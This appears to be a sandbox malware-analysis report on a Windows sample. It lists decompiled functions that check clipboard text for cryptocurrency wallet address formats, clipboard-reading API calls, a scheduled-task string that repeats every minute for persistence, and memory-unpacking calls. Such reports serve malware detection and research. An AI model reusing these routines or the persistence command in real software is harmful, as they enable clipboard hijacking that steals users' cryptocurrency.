                                                                                                                                                                                          • Instruction ID: fdf06efbe065a151bc7ca3d8de09cf6a9abfcdffc1ecb06711ebebe3684aa0c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3611736a4f00d3dc56c7b6daf18abb9b521060ec6e09dd6e3217bacfd76b68f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F4108B1E045299FDB24CF58C941BAEB7B5FF85314F1080A9D648B7281D3786E81CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Second clipboard-content check. Accepts a wide string whose shape is
			   consistent with a Dogecoin address: exactly 34 characters, a leading 'D',
			   a second character in A-H, J-N, P-U or 5-9, and none of the characters
			   Base58 leaves out in the remainder. The listing is truncated below; the
			   visible part rejects '0', 'O' and 'I'. Comments added by the editor. */
			E00402039(WCHAR* __ecx) {
				signed int _t4;
				WCHAR* _t8;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;

				_t12 = __ecx;
				_t11 = 0x44;                                            /* 'D' */
				/* first character must be 'D' and the length 0x22 = 34 wide characters */
				if( *__ecx != _t11 || lstrlenW(__ecx) != 0x22) {
					L31:
					return 0;                                           /* not an address of the expected shape */
				} else {
					_t4 =  *(_t12 + 2) & 0x0000ffff;                    /* second character (byte offset 2 of a WCHAR string) */
					/* 0x41..0x48 'A'..'H', 0x4a..0x4e 'J'..'N', 0x50..0x55 'P'..'U', 0x35..0x39 '5'..'9' */
					if(_t4 == 0x41 || _t4 == 0x42 || _t4 == 0x43 || _t4 == _t11 || _t4 == 0x45 || _t4 == 0x46 || _t4 == 0x47 || _t4 == 0x48 || _t4 == 0x4a || _t4 == 0x4b || _t4 == 0x4c || _t4 == 0x4d || _t4 == 0x4e || _t4 == 0x50 || _t4 == 0x51 || _t4 == 0x52 || _t4 == 0x53 || _t4 == 0x54 || _t4 == 0x55 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == 0x38 || _t4 == 0x39) {
						_t13 = _t12 + 4;                                /* remainder after the two-character prefix */
						/* reject '0' (0x30), 'O' (0x4f) and 'I' (0x49) anywhere in the remainder */
						if(StrChrW(_t13, 0x30) != 0 || StrChrW(_t13, 0x4f) != 0 || StrChrW(_t13, 0x49) != 0) {
							goto L31;
						} else {
                                                                                                                                                                                          							_t8 = StrChrW(_t13, 0x6c);
                                                                                                                                                                                          							if(_t8 != 0) {
                                                                                                                                                                                          								goto L31;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							return  &(_t8[0]);
                                                                                                                                                                                          						}
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						goto L31;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}

APIs
• lstrlenW.KERNEL32(?,?,?,0040186D,?,00401CAF), ref: 0040204A
• StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 004020DB
• StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 004020E8
• StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 004020F5
• StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00402102
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
• Instruction ID: 466335ad568ae336ba92fb9fe317f6dce376568ae05578ed0c81c2f4d013b137
• Opcode Fuzzy Hash: 033baab36fa4e63d4656868d84d7ccad315465f935aa9d4d00be32e2960f9c69
• Instruction Fuzzy Hash: 1D1106B110225211DA3855181FCD63F3D645B4E7A07A80833EB25F86E4EAFCCDC2DA4E
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,02C61ABD), ref: 02C6229A
• StrChrW.SHLWAPI(?,00000030,?,?,?,02C61ABD), ref: 02C6232B
• StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62338
• StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62345
• StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,?,02C61ABD), ref: 02C62352
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
• Instruction ID: 8dabf1dfc9f8d5580f857da9f5b39cb1fc278058b27f69e8ef9bf25f7690aace
• Opcode Fuzzy Hash: 1dfb8a87e815566c9d5978d19a236094ff7e72a8b195f751a92239c3df4cb982
• Instruction Fuzzy Hash: 791107A194A152919B3E1A1D58CC63E2AFC5BCF9987AC0837EE2DE407DD314C3C25257
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00401F9E(WCHAR* __ecx) {
	signed int _t4;
	WCHAR* _t8;
	void* _t11;
	short _t12;
	intOrPtr* _t13;
	WCHAR* _t14;

	_t13 = __ecx;
	if(lstrlenW(__ecx) != 0x5f) {
		L19:
		return 0;
	} else {
		_t11 = 0x38;
		if( *_t13 != _t11) {
			goto L19;
		} else {
			_t4 = *(_t13 + 2) & 0x0000ffff;
			_t12 = 0x30;
			if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t12 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == 0x34 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == _t11 || _t4 == 0x39) {
				_t14 = _t13 + 4;
				if(StrChrW(_t14, _t12) != 0 || StrChrW(_t14, 0x4f) != 0 || StrChrW(_t14, 0x49) != 0) {
					goto L19;
				} else {
					_t8 = StrChrW(_t14, 0x6c);
					if(_t8 != 0) {
						goto L19;
					} else {
						return &(_t8[0]);
					}
				}
			} else {
				goto L19;
			}
		}
	}
}

APIs
• lstrlenW.KERNEL32(?,?,0040183B,?,00401CAF), ref: 00401FA2
• StrChrW.SHLWAPI(?,00000030,?,00401CAF), ref: 00402001
• StrChrW.SHLWAPI(?,0000004F,?,00401CAF), ref: 0040200E
• StrChrW.SHLWAPI(?,00000049,?,00401CAF), ref: 0040201B
• StrChrW.SHLWAPI(?,0000006C,?,00401CAF), ref: 00402028
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                                                                                                                                                                                          • Instruction ID: 21b8f5aec0fffbc79c888ae13ffe846aaa01b4b90668c19f07de86945adb2a49
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D01806A14023715DA382A286D4CE7B26585F5A790B58443BEB01F6AF0E3FCCD82A18D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,02C61A8B), ref: 02C621F2
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000030,?,?,02C61A8B), ref: 02C62251
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6225E
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C6226B
                                                                                                                                                                                          • StrChrW.SHLWAPI(?,0000006C,?,00000049,?,0000004F,?,00000030,?,?,02C61A8B), ref: 02C62278
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction ID: fea8747bd611898e270794846a42abec6af706c172346e5c980e488a7ffac52c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 328b822c4393c529a9a899670a59262547426000f33717c38db6df60201e6aa8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B00171E114016215DB742A2CACCCB7E23599FC7D78B1A4427FE46E60F0E318C7CA518B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FE2
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,02C615D5), ref: 02C61FEF
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,02C615D5), ref: 02C62000
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 02C62021
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 02C61FEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction ID: 0e2accd316f0740cf4790ddd6ead8351873a64eea53320718b967e6aeada0125
                                                                                                                                                                                          • Opcode Fuzzy Hash: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501B575600200EFD7205FA9DC89A6ABAFAEFC8312F18043DA286E3361D7B14941DA51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041948F
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00421DC8), ref: 0041949A
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 004194A2
                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004194AA
                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 004194B4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalDeleteEnterEnvironmentErrorFileFreeLastLibraryLoadSectionStrings
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2355528868-0
                                                                                                                                                                                          • Opcode ID: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction ID: be5c53dd517337924b076f4d2e36b75196b0ade31bde952fcd212899ea8bb193
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08C35945208DFC701EFA0E85DA9A7F74FB0D302F008661EA5587251CB301965CBEA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D8F
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 02C61D9C
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61DA9
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61DB6
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61DBC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataOpenWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1198520892-0
                                                                                                                                                                                          • Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction ID: 7b2c4b9573123fbccf7064afa3b12f5066a46d4c37b8a204b6c6bbf2f1f61c3c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E086B610152197C2222764BD4CB6FAE78AFC1A5270A0139FF05F2211DB74C90185B4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction ID: 7e99398a2989f63ab91d86e5d1f340e94c6fbd712eeb2fe5690cc7a552c25abe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction Fuzzy Hash: 104118B1E041299FDB24CF58C941BAEB7B5FF85314F1080AAD548B7281D3786E85CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction ID: be5f340bf6e2c4c7509da247219f0037cb9acdb6af063adddbb9452891412781
                                                                                                                                                                                          • Opcode Fuzzy Hash: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 454128B1E045299FDB24CF48C981BAEB7B5FF85314F0080A9D648B7281D7786E81CF1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction ID: 04074a4d55adec1fb7484b132e08c3b3bdfbdf4c825e8fe88e8a3d54cb31c223
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41C4B1905628DFEB24CF99D889BEEB7B5FB44304F20859AD009A7240D778AAC1CF44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
• Instruction ID: e2ad673a9e1fbcd92f3034303dd506abada369279c597e6f7b0f1569caf1cc2c
• Opcode Fuzzy Hash: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
• Instruction Fuzzy Hash: BE4109B1E045299FDB24CF58C941B9EB7B5FB85314F1080E9D648A7281D3786E81CF1A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
• Instruction ID: 370d043033f9b44dbe123085fe21159393ba80c6a027f265584c43808d9c422b
• Opcode Fuzzy Hash: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
• Instruction Fuzzy Hash: A341B2B1905628DFEB24CF99D889BEEB7B5BB44304F20859AD409A7240D778AEC1CF45
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l_get_int_arg
• String ID: 9
• API String ID: 830925916-2366072709
• Opcode ID: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
• Instruction ID: 666b9c603c242c8d3fdac598ba9bfaf6b48c2fc0eb3efceb7bcde3098d1ea408
• Opcode Fuzzy Hash: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
• Instruction Fuzzy Hash: F54114B0E405299FDB24CF58C981B9EB7B5BF85314F0081AAE24AA7241C7345E918F59
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMTD ref: 00417D2D
  • Part of subcall function 004097C0: __getptd_noexit.LIBCMTD ref: 004097C6
• __getptd.LIBCMTD ref: 00417D3B
• ___DestructExceptionObject.LIBCMTD ref: 00417DA8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: __getptd$DestructExceptionObject__getptd_noexit
• String ID: csm
• API String ID: 4290476786-1018135373
• Opcode ID: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
• Instruction ID: c5ae066ec79feb25a95b830f48a347be30d413994d22970f6ff8f0c253586eec
• Opcode Fuzzy Hash: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
• Instruction Fuzzy Hash: 6B11E675900208EBCF14DF65E4449EA7776AF54305F54806AE8095B342DB39DEC1CBE9
Uniqueness

Uniqueness Score: -1.00%

APIs
• CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
• GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
• FindNextFileA.KERNEL32(00000000,?), ref: 00419970
• GetStdHandle.KERNEL32(00000000), ref: 004199AD
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: File$AliasesConsoleCopyFindHandleLengthNext
• String ID:
• API String ID: 3298809309-0
• Opcode ID: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
• Instruction ID: dd6d673cba380057cd47230387bf578ec1fc145cf7a011dd64b80df19d897493
• Opcode Fuzzy Hash: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
• Instruction Fuzzy Hash: 0021F5B4E00218EBDB14CF95CC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
Uniqueness

Uniqueness Score: -1.00%

APIs
• CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
• GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
• FindNextFileA.KERNEL32(00000000,?), ref: 00419970
• GetStdHandle.KERNEL32(00000000), ref: 004199AD
Memory Dump Source
• Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: File$AliasesConsoleCopyFindHandleLengthNext
• String ID:
• API String ID: 3298809309-0
• Opcode ID: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
• Instruction ID: b61365670aa742c41b5a739128c8f99abb57d842f36a5c524496bbebd42e7819
• Opcode Fuzzy Hash: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
• Instruction Fuzzy Hash: 2621F8B4E00218EBDB14CF95DC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
Uniqueness

Uniqueness Score: -1.00%

Executed Functions

APIs
• lstrlenW.KERNEL32(02B77408), ref: 00419C04
• _memset.LIBCMT ref: 00419C31
  • Part of subcall function 00419350: GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
  • Part of subcall function 00419350: GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
  • Part of subcall function 00419350: VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
  • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A0C
  • Part of subcall function 004199E0: GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
  • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A32
  • Part of subcall function 004199E0: GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
  • Part of subcall function 004199E0: GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
  • Part of subcall function 004199E0: GetCommandLineW.KERNEL32 ref: 00419A6F
  • Part of subcall function 004199E0: GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
  • Part of subcall function 004199E0: SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
  • Part of subcall function 004199E0: CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
  • Part of subcall function 004199E0: GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
  • Part of subcall function 004199E0: HeapDestroy.KERNEL32(00000000), ref: 00419B51
• GetCommState.KERNEL32(00000000,?), ref: 00419CFA
• CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419D08
• GetLastError.KERNEL32 ref: 00419D43
• GetProfileStringW.KERNEL32(00421FA8,00421F78,00421F68,?,00000000), ref: 00419D6A
• CreateActCtxA.KERNEL32(?), ref: 00419DD1
• LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 00419DF7
• UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E07
• SetThreadLocale.KERNEL32(00000000), ref: 00419E4C
• HeapWalk.KERNEL32(00000000,00000000), ref: 00419E56
• WriteProfileStringW.KERNEL32(00422040,00422030,00421FF4), ref: 00419E6B
• SetThreadIdealProcessor.KERNEL32(00000000,00000000), ref: 00419E75
• EnumResourceLanguagesW.KERNEL32(00000000,00422120,00422078,00000000,00000000), ref: 00419EC0
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC8
• FindNextFileA.KERNEL32(00000000,?), ref: 00419ED7
• CreateSemaphoreA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F09
• GetConsoleAliasExesLengthW.KERNEL32 ref: 00419F0F
• GetSystemTime.KERNEL32(00000000), ref: 00419F17
• GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F5F
• UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 00419F7E
• InterlockedDecrement.KERNEL32(?), ref: 00419F8B
• FindResourceExA.KERNEL32(00000000,004221C0,00422194,00000000), ref: 00419F9F
• FindAtomW.KERNEL32(004221F0), ref: 00419FDF
• GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FE9
• OpenMutexA.KERNEL32(00000000,00000000,00422248), ref: 00419FF8
• CopyFileExW.KERNEL32(00422294,00422258,00000000,00000000,00000000,00000000), ref: 0041A057
• WritePrivateProfileStringA.KERNEL32(004222FC,004222E0,004222C8,004222C0), ref: 0041A071
Strings
Memory Dump Source
• Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
Similarity
• API ID: File$Profile$Create$ErrorFindLastPrivateStringThreadTime$HeapInfoResourceWrite$AddressAliasAtomBinaryCommCommandCompletionConsoleContextCopyDecrementDestroyEnumEnvironmentExesFormatFreeHandleIdealInterlockedLanguagesLengthLineLocalLocaleModuleMutexNameNamedNextNumberOpenPipePortProcProcessorProtectSemaphoreShortStartupStateStringsSystemTypeUnlockUnregisterVirtualWaitWalk_memsetlstrlen
• String ID: ";$$.$&Pc$Pc$ficizulagavigajenum
• API String ID: 3387768851-811891720
                                                                                                                                                                                          • Opcode ID: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction ID: f31b9a8bc7d1aa8fd04b4e2830f0ca4a4d395b920a6dc1273bc76c120149c905
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B17334A84314EBDB249F60ED56BE977B0FB04705F1084AAE209662C0C7B81EC5DF9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C6024D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                          • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction ID: 751fb6d7ad82fa6ada8a52c97ba949136f1f036daebde48c75e9f8c067353c80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32525974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 2099061454-2766056989
                                                                                                                                                                                          • Opcode ID: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction ID: d9ae2ebe879e639c4e3b926cec9c7d8b58d644c20bdcb63d04e190339fc0cd6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32216D21908AC0FED302CB7CFD5862A3FA74326244F0866B9D495472BFC6792118DB7E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02C60223,?,?), ref: 02C60E02
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02C60223,?,?), ref: 02C60E07
